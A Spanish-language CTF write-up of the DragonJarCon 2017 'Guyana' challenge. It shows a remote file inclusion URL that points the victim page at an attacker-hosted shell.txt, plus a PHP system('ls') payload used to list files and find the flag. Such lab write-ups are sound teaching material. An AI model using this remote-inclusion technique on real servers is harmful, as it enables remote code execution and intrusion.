Writeup de Guyana del CTF DragonjarCon 2017 | RFI

mapa del mundo que es la interfaz del ctf con Guyana resaltado.

Este post es un writeup de Guyana del CTF realizado en la Dragon Jar Conference 2017. O en español un solucionario del reto Guyana de 200 puntos.

Si no tienes ni idea de porqué estás aquí; pues estás aquí para aprender, léete todos los post y sigue todos los links. Y si no sabes que es un CTF te recomendamos este post.

explicación del reto Guyana del CTF DragonjarCon 2017

pantalla de descripción del reto, muestra el puntaje y la descripción del reto Guyana del CTF esto no tiene explicación y una ip.

En este reto la única pista que nos dan es “rfi” con lo cual procedemos a visualizar la pagina:   http://165.227.100.202:54321/rfi

pagina web con 2 links.

Como podemos observar nos muestra únicamente 2 enlaces:

“Ethical Hacking Consultores”

“DragonJar Conference”

Con lo cual damos clic al primer enlace y nos muestra lo siguiente:

foto bastante grande publicidad de Ethical Hacking group.

Luego damos clic al segundo link y nos muestra lo siguiente:

pagina web con muchos caracteres ascii no reconocidos.

Una vez identificado como funciona la página, procedemos a testear el RFI básico:

Ej: http://[servidor_victima]/index.php?page=http://[servidor_atacante]/shell.txt

Con el ejemplo anterior  se ejecutaría lo que tengamos en ese shell.txt en el servidor de la victima y se interpretará todo como php.

Solución

Ej: 
<?
  system(‘ls’);
?>

Con el código anterior se ejecutaría el comando “ls”  el cual se usa para listar los archivos de un directorio.

Una vez listo nuestro shell.txt la subimos a un server propio y la visualizamos desde el server de la victima como se muestra en la siguiente imagen:

Como pueden ver en la próxima imagen nuestro shell.txt se llama a.txt.

pagina web que muestra una lista de palabras juntas.

Tal y como se puede observar al ejecutar el comando “ls” nos lista 3 archivos:

“dragonJarConf.png”

“ehcgroup”

“index.php”

“-2s3d5f6g7g549fy4nfp734lk37-“

Lo cual deducimos que la flag es el último archivo, por lo tanto lo llamamos desde la url de la siguiente forma:

pagina web que muestra la flag.

Ya una vez obtenida la bandera procedemos a validarla.

interfaz de la descripción del reto con la flag y un boton con YES!

Gracias por leer nuestro post puedes unirte a nuestras redes sociales.

Facebook Twitter Slack  y por ahí se dice que tenemos un grupo secreto 👽 de whatsapp; pero te tenemos que conocer primero, podemos hablar en slack :).

Nos ayudarías si compartieras.

0 comments on “Writeup de Guyana del CTF DragonjarCon 2017 | RFIAdd yours →

Leave a Reply

Your email address will not be published. Required fields are marked *